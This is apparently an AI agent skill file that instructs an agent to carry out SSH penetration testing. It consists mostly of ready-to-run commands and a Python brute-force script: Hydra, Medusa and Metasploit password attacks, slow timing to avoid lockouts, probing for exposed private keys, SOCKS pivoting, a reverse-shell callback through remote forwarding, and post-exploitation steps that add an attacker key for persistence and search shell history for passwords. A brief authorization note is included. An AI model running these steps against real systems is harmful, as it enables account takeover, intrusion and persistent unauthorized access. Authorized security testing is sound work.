Antigravity-awesome-skills ssh-penetration-testing

Conduct comprehensive SSH security assessments including enumeration, credential attacks, vulnerability exploitation, tunneling techniques, and post-exploitation activities. This skill covers the complete methodology for testing SSH service security.

install

source · Clone the upstream repo

git clone https://github.com/sickn33/antigravity-awesome-skills

Claude Code · Install into ~/.claude/skills/

T=$(mktemp -d) && git clone --depth=1 https://github.com/sickn33/antigravity-awesome-skills "$T" && mkdir -p ~/.claude/skills && cp -r "$T/plugins/antigravity-awesome-skills/skills/ssh-penetration-testing" ~/.claude/skills/sickn33-antigravity-awesome-skills-ssh-penetration-testing-3ac032 && rm -rf "$T"

manifest: plugins/antigravity-awesome-skills/skills/ssh-penetration-testing/SKILL.md

SSH Penetration Testing

Purpose

Prerequisites

Required Tools

Nmap with SSH scripts
Hydra or Medusa for brute-forcing
ssh-audit for configuration analysis
Metasploit Framework
Python with Paramiko library

Required Knowledge

SSH protocol fundamentals
Public/private key authentication
Port forwarding concepts
Linux command-line proficiency

Outputs and Deliverables

SSH Enumeration Report - Versions, algorithms, configurations
Credential Assessment - Weak passwords, default credentials
Vulnerability Assessment - Known CVEs, misconfigurations
Tunnel Documentation - Port forwarding configurations

Core Workflow

Phase 1: SSH Service Discovery

Identify SSH services on target networks:

# Quick SSH port scan
nmap -p 22 192.168.1.0/24 --open

# Common alternate SSH ports
nmap -p 22,2222,22222,2200 192.168.1.100

# Full port scan for SSH
nmap -p- --open 192.168.1.100 | grep -i ssh

# Service version detection
nmap -sV -p 22 192.168.1.100

Phase 2: SSH Enumeration

Gather detailed information about SSH services:

# Banner grabbing
nc 192.168.1.100 22
# Output: SSH-2.0-OpenSSH_8.4p1 Debian-5

# Telnet banner grab
telnet 192.168.1.100 22

# Nmap version detection with scripts
nmap -sV -p 22 --script ssh-hostkey 192.168.1.100

# Enumerate supported algorithms
nmap -p 22 --script ssh2-enum-algos 192.168.1.100

# Get host keys
nmap -p 22 --script ssh-hostkey --script-args ssh_hostkey=full 192.168.1.100

# Check authentication methods
nmap -p 22 --script ssh-auth-methods --script-args="ssh.user=root" 192.168.1.100

Phase 3: SSH Configuration Auditing

Identify weak configurations:

# ssh-audit - comprehensive SSH audit
ssh-audit 192.168.1.100

# ssh-audit with specific port
ssh-audit -p 2222 192.168.1.100

# Output includes:
# - Algorithm recommendations
# - Security vulnerabilities
# - Hardening suggestions

Key configuration weaknesses to identify:

Weak key exchange algorithms (diffie-hellman-group1-sha1)
Weak ciphers (arcfour, 3des-cbc)
Weak MACs (hmac-md5, hmac-sha1-96)
Deprecated protocol versions

Phase 4: Credential Attacks

Brute-Force with Hydra

# Single username, password list
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.100

# Username list, single password
hydra -L users.txt -p Password123 ssh://192.168.1.100

# Username and password lists
hydra -L users.txt -P passwords.txt ssh://192.168.1.100

# With specific port
hydra -l admin -P passwords.txt -s 2222 ssh://192.168.1.100

# Rate limiting evasion (slow)
hydra -l admin -P passwords.txt -t 1 -w 5 ssh://192.168.1.100

# Verbose output
hydra -l admin -P passwords.txt -vV ssh://192.168.1.100

# Exit on first success
hydra -l admin -P passwords.txt -f ssh://192.168.1.100

Brute-Force with Medusa

# Basic brute-force
medusa -h 192.168.1.100 -u admin -P passwords.txt -M ssh

# Multiple targets
medusa -H targets.txt -u admin -P passwords.txt -M ssh

# With username list
medusa -h 192.168.1.100 -U users.txt -P passwords.txt -M ssh

# Specific port
medusa -h 192.168.1.100 -u admin -P passwords.txt -M ssh -n 2222

Password Spraying

# Test common password across users
hydra -L users.txt -p Summer2024! ssh://192.168.1.100

# Multiple common passwords
for pass in "Password123" "Welcome1" "Summer2024!"; do
    hydra -L users.txt -p "$pass" ssh://192.168.1.100
done

Phase 5: Key-Based Authentication Testing

Test for weak or exposed keys:

# Attempt login with found private key
ssh -i id_rsa user@192.168.1.100

# Specify key explicitly (bypass agent)
ssh -o IdentitiesOnly=yes -i id_rsa user@192.168.1.100

# Force password authentication
ssh -o PreferredAuthentications=password user@192.168.1.100

# Try common key names
for key in id_rsa id_dsa id_ecdsa id_ed25519; do
    ssh -i "$key" user@192.168.1.100
done

Check for exposed keys:

# Common locations for private keys
~/.ssh/id_rsa
~/.ssh/id_dsa
~/.ssh/id_ecdsa
~/.ssh/id_ed25519
/etc/ssh/ssh_host_*_key
/root/.ssh/
/home/*/.ssh/

# Web-accessible keys (check with curl/wget)
curl -s http://target.com/.ssh/id_rsa
curl -s http://target.com/id_rsa
curl -s http://target.com/backup/ssh_keys.tar.gz

Phase 6: Vulnerability Exploitation

Search for known vulnerabilities:

# Search for exploits
searchsploit openssh
searchsploit openssh 7.2

# Common SSH vulnerabilities
# CVE-2018-15473 - Username enumeration
# CVE-2016-0777 - Roaming vulnerability
# CVE-2016-0778 - Buffer overflow

# Metasploit enumeration
msfconsole
use auxiliary/scanner/ssh/ssh_version
set RHOSTS 192.168.1.100
run

# Username enumeration (CVE-2018-15473)
use auxiliary/scanner/ssh/ssh_enumusers
set RHOSTS 192.168.1.100
set USER_FILE /usr/share/wordlists/users.txt
run

Phase 7: SSH Tunneling and Port Forwarding

Local Port Forwarding

Forward local port to remote service:

# Syntax: ssh -L <local_port>:<remote_host>:<remote_port> user@ssh_server

# Access internal web server through SSH
ssh -L 8080:192.168.1.50:80 user@192.168.1.100
# Now access http://localhost:8080

# Access internal database
ssh -L 3306:192.168.1.50:3306 user@192.168.1.100

# Multiple forwards
ssh -L 8080:192.168.1.50:80 -L 3306:192.168.1.51:3306 user@192.168.1.100

Remote Port Forwarding

Expose local service to remote network:

# Syntax: ssh -R <remote_port>:<local_host>:<local_port> user@ssh_server

# Expose local web server to remote
ssh -R 8080:localhost:80 user@192.168.1.100
# Remote can access via localhost:8080

# Reverse shell callback
ssh -R 4444:localhost:4444 user@192.168.1.100

Dynamic Port Forwarding (SOCKS Proxy)

Create SOCKS proxy for network pivoting:

# Create SOCKS proxy on local port 1080
ssh -D 1080 user@192.168.1.100

# Use with proxychains
echo "socks5 127.0.0.1 1080" >> /etc/proxychains.conf
proxychains nmap -sT -Pn 192.168.1.0/24

# Browser configuration
# Set SOCKS proxy to localhost:1080

ProxyJump (Jump Hosts)

Chain through multiple SSH servers:

# Jump through intermediate host
ssh -J user1@jump_host user2@target_host

# Multiple jumps
ssh -J user1@jump1,user2@jump2 user3@target

# With SSH config
# ~/.ssh/config
Host target
    HostName 192.168.2.50
    User admin
    ProxyJump user@192.168.1.100

Phase 8: Post-Exploitation

Activities after gaining SSH access:

# Check sudo privileges
sudo -l

# Find SSH keys
find / -name "id_rsa" 2>/dev/null
find / -name "id_dsa" 2>/dev/null
find / -name "authorized_keys" 2>/dev/null

# Check SSH directory
ls -la ~/.ssh/
cat ~/.ssh/known_hosts
cat ~/.ssh/authorized_keys

# Add persistence (add your key)
echo "ssh-rsa AAAAB3..." >> ~/.ssh/authorized_keys

# Extract SSH configuration
cat /etc/ssh/sshd_config

# Find other users
cat /etc/passwd | grep -v nologin
ls /home/

# History for credentials
cat ~/.bash_history | grep -i ssh
cat ~/.bash_history | grep -i pass

Phase 9: Custom SSH Scripts with Paramiko

Python-based SSH automation:

#!/usr/bin/env python3
import paramiko
import sys

def ssh_connect(host, username, password):
    """Attempt SSH connection with credentials"""
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    
    try:
        client.connect(host, username=username, password=password, timeout=5)
        print(f"[+] Success: {username}:{password}")
        return client
    except paramiko.AuthenticationException:
        print(f"[-] Failed: {username}:{password}")
        return None
    except Exception as e:
        print(f"[!] Error: {e}")
        return None

def execute_command(client, command):
    """Execute command via SSH"""
    stdin, stdout, stderr = client.exec_command(command)
    output = stdout.read().decode()
    errors = stderr.read().decode()
    return output, errors

def ssh_brute_force(host, username, wordlist):
    """Brute-force SSH with wordlist"""
    with open(wordlist, 'r') as f:
        passwords = f.read().splitlines()
    
    for password in passwords:
        client = ssh_connect(host, username, password.strip())
        if client:
            # Run post-exploitation commands
            output, _ = execute_command(client, 'id; uname -a')
            print(output)
            client.close()
            return True
    return False

# Usage
if __name__ == "__main__":
    target = "192.168.1.100"
    user = "admin"
    
    # Single credential test
    client = ssh_connect(target, user, "password123")
    if client:
        output, _ = execute_command(client, "ls -la")
        print(output)
        client.close()

Phase 10: Metasploit SSH Modules

Use Metasploit for comprehensive SSH testing:

# Start Metasploit
msfconsole

# SSH Version Scanner
use auxiliary/scanner/ssh/ssh_version
set RHOSTS 192.168.1.0/24
run

# SSH Login Brute-Force
use auxiliary/scanner/ssh/ssh_login
set RHOSTS 192.168.1.100
set USERNAME admin
set PASS_FILE /usr/share/wordlists/rockyou.txt
set VERBOSE true
run

# SSH Key Login
use auxiliary/scanner/ssh/ssh_login_pubkey
set RHOSTS 192.168.1.100
set USERNAME admin
set KEY_FILE /path/to/id_rsa
run

# Username Enumeration
use auxiliary/scanner/ssh/ssh_enumusers
set RHOSTS 192.168.1.100
set USER_FILE users.txt
run

# Post-exploitation with SSH session
sessions -i 1

Quick Reference

SSH Enumeration Commands

Command	Purpose
`nc <host> 22`	Banner grabbing
`ssh-audit <host>`	Configuration audit
`nmap --script ssh*`	SSH NSE scripts
`searchsploit openssh`	Find exploits

Brute-Force Options

Tool	Command
Hydra	`hydra -l user -P pass.txt ssh://host`
Medusa	`medusa -h host -u user -P pass.txt -M ssh`
Ncrack	`ncrack -p 22 --user admin -P pass.txt host`
Metasploit	`use auxiliary/scanner/ssh/ssh_login`

Port Forwarding Types

Type	Command	Use Case
Local	`-L 8080:target:80`	Access remote services locally
Remote	`-R 8080:localhost:80`	Expose local services remotely
Dynamic	`-D 1080`	SOCKS proxy for pivoting

Common SSH Ports

Port	Description
22	Default SSH
2222	Common alternate
22222	Another alternate
830	NETCONF over SSH

Constraints and Limitations

Legal Considerations

Always obtain written authorization
Brute-forcing may violate ToS
Document all testing activities

Technical Limitations

Rate limiting may block attacks
Fail2ban or similar may ban IPs
Key-based auth prevents password attacks
Two-factor authentication adds complexity

Evasion Techniques

Use slow brute-force:
```
-t 1 -w 5
```
Distribute attacks across IPs
Use timing-based enumeration carefully
Respect lockout thresholds

Troubleshooting

Issue	Solutions
Connection Refused	Verify SSH running; check firewall; confirm port; test from different IP
Authentication Failures	Verify username; check password policy; key permissions (600); authorized_keys format
Tunnel Not Working	Check GatewayPorts/AllowTcpForwarding in sshd_config; verify firewall; use `ssh -v`

When to Use

This skill is applicable to execute the workflow or actions described in the overview.